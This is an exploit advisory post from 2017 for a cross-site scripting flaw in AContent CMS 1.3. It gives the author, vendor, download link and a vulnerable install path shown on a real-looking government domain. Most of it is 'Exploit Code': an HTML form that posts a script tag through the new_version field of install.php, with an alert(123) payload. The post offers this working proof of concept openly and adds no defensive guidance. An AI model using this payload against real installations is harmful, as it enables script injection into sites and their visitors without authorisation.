AContent CMS 1.3 Cross Site Scripting
Posted on 02 January 2017
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title:A Cross Site Scripting in AContent Content Management System |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download |[+] |[+] Version : 1.3|[+] |[+] Vendor : http://www.atutor.ca/acontent/ |[+] |[+] Tested on:A Kali Linux |[+] |[+] Date: 12 /29 / 2016 |=============================================================| |[+] Vuln Path : http://www.site.go.th/AContent/install/install.php |[+] Method : POST |=============================================================| |[+] Exploit Code: A <form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form"> A A A <input type="hidden" name="action" value="process" /> A A A <input type="hidden" name="step" value="1" /> A A A <input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" /> A A A A A A <input type="submit" name="submit" class="button" value="I Agree" /> A A A A A A A <input type="submit" name="submit" class="button" value="I Disagree" /><br /> A A A </form> |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : M.R.S.L.Y |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
